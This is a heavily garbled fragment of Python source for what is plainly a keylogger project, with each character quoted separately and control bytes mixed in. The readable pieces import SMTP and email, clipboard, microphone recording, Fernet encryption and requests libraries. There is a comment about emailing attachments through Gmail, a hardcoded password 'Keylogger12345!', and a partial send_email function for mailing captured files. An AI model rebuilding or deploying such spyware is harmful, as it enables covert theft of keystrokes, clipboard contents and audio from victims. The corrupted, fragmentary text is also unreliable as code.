'v''v''v''v''v''v''v''v'
<96>
"'"



































'f''f''f''f'
'f''r''o'


'#''L''o''g''g''e''r'
'L''u''i'

'I'
'i''b''r''a''r'
'a'
'r''y''h''o''w'
't''o'
'u''s''e'
'b''y'
'c''h''a''r''m'
'f''o''r'







'r''m'











'p''o''s''t'
'b'
'o''y'

'p''y''c''h''z''r''m'


'a''r''m'
'o''r'

'p''r''o''j''e''c''t''s'
'o''n'
'g''i''t''h''u''b''I''n''i''t''i''a''l'
'c''o''m'


'C''o''m''i'
'm''i''t''g''g''g''g'












'd''d''d''d''d''d''-''1''1''-''1''-''1''_''!'<189><49><189><49><189>





























'#''e'
'E''m''a''i''l'
'L''i''b''r''a''r''y''f''r''o''m'
'e''m''a''i''l''.''m''i''.''m''u''M''n'
'i''f''r''o''m'
'e''m''a''i''l''.''m''i''n''e'' '
'.''t''e''x''t'
'i''m''p''o''r''t'
'M''i'
'I''N''E'



'M''E''T''e''x''t''f''r''o''m'
'e''m''a''i''l''.''m''i''n''e''.''b''a''s''e''.''i''m''p''o''r''t'
'M''I'
'i''n'
'm''e''B''a'




'I''M''E''B''A''s''e'


'a''s''e'


'm'

'm'
'f''r''o''m'
'e''m''a''i''l'
'i''m''p''o''r''t'
'e''n''c''o''s''d''e'


'd''e''r''s''i''m''p''o''r''t'
's''m''t''p''l''i''b''i''m''p''o''r''t'
's''o''c''k''e''t''i''m''p''o''r''t'
'p''l''a''t''f''o''r''m''i''m''p''o''r''t'
'w''i'










'i''m''p''o''r''t'
'w''i''n''2''3'

'3''2'

'c''l''i''p''b''o''a''r''d'

'#''i''m''p''o''r''t'
'w''i''n''3''2'

'c''l''i''p''b''o''a''r''d''f''r'


'i''m''p''r''t'

'r'
'p''r''t'

'o''r''t'
't''i'






'o''r''t'
't''i''m''e''i''m''p''o''r''t'
'o''s'
'f''r''o''m'
's''c''r'
'i''p''y''.''i''o''.''w''a''v''f''i''l''e'
'i''m''p''o''r''t'
'w''r''i''t''e'
'i''m''o'
'p''o''r''t'
's''o''u''n''d''d''e''v''i''c''e'
'a''s'
's''d'


'f''r'

'f''r''o''m'
'c''y''p'

'r''y''p''t''o''g''r''a''p''h''y''/''.'

'.''f''r'
'e''r''n''e''t'
'i''m''p''o''r''t'
'F''e''r''n''e''t'

'i''m''p''o''r''t'
'g''e''t''p''a''s''s'

'f''r''o''m'
'r''e''q''u''e''s''t''s'
'i''m''p''o''r''t'
'g''e''t'






'l'
'a''d''d''e''d'
'i'
'l''i''b''r''a''r''i''e''s'

's''e''n''d'
'm''a''i''l'
'a''t''t''a''t''c''g'
'h''m''e''n''t'
'p''y''t''h''o''n'
'u''s''i''n''g'
'g''m''a''i''l''\x03''\x03''\x03''\x03''\x03''\x03''\x03''\x16''\x03''\x03''\x03''\x16''\x03''\x16'











'v''v''v''v''v''v''f''g''g'
'\x08''g''m''a''k''a''y'

'e''y''l''o''g''g''e''r''p''r''o''j''e''c''t''k''e''y'


'k''e''y''l''o''g''g''e''r''p''o'

'p''r''o''j''e''c''t'






'F''6''7''U''4''9''2'










'k'
'K''e''y''l''o'
'o''g''g''w''e''r'


'e''r'

'e''r''P''r''o''j''e''c''t''k''e''y''l''o''g''g''e''r''p''o''r'

'r''o''j''e''c''t''K''e''y''l''o''g''g''e''r''1''2''3''4''5''!''K''e''y''l''o''g''g''e''r''1''2''3''4''5''!'<103><100><96><98><96><103><96><97><98><96><96><97>
<96><97><105><105><105>'\x03''\x03''\x03''\x03''\x03''\x03'







'4''p''a''s''s''o'
'w''o''r''d'
'='
'"''K''e''y''l''o''g''g''e''r''1''2''3''4''5''!''t''o''a''d''d''r'
'='
'"''c''o''m'


'\x03''\x16''d''e''f'
's''e''n''d''_''e''m''a''i''l''(''f''u''k''e''_'')'




'i''l''e''_''p''a''t''h'' ''a''t''t''a''t''c''h''m''e''n''t'' '
't''o''a''d''d''r'
')'
')'':''f''r''o''m''a''d''d''r''e''s''s'
'A'
'a''r''e''s'


'e''s''s''e''s''s'
'='
'e''m''a''i''l''_''a''d''m''s''g'
'='
'M''i''m''e''('')''m''s''g''['"'"'F''r''o''m''\x03''\x16'


































"'"' '
'f''i''l''e'

















"'"'a''t''t''a''t''c''h''m''e''n''t'' '
'f''i''l''e'


'='








'f''o''l''d''e''r'





'e''m''a''i''l''_''f''o''l''d''e''r'
'='
'e''m''a''i''l'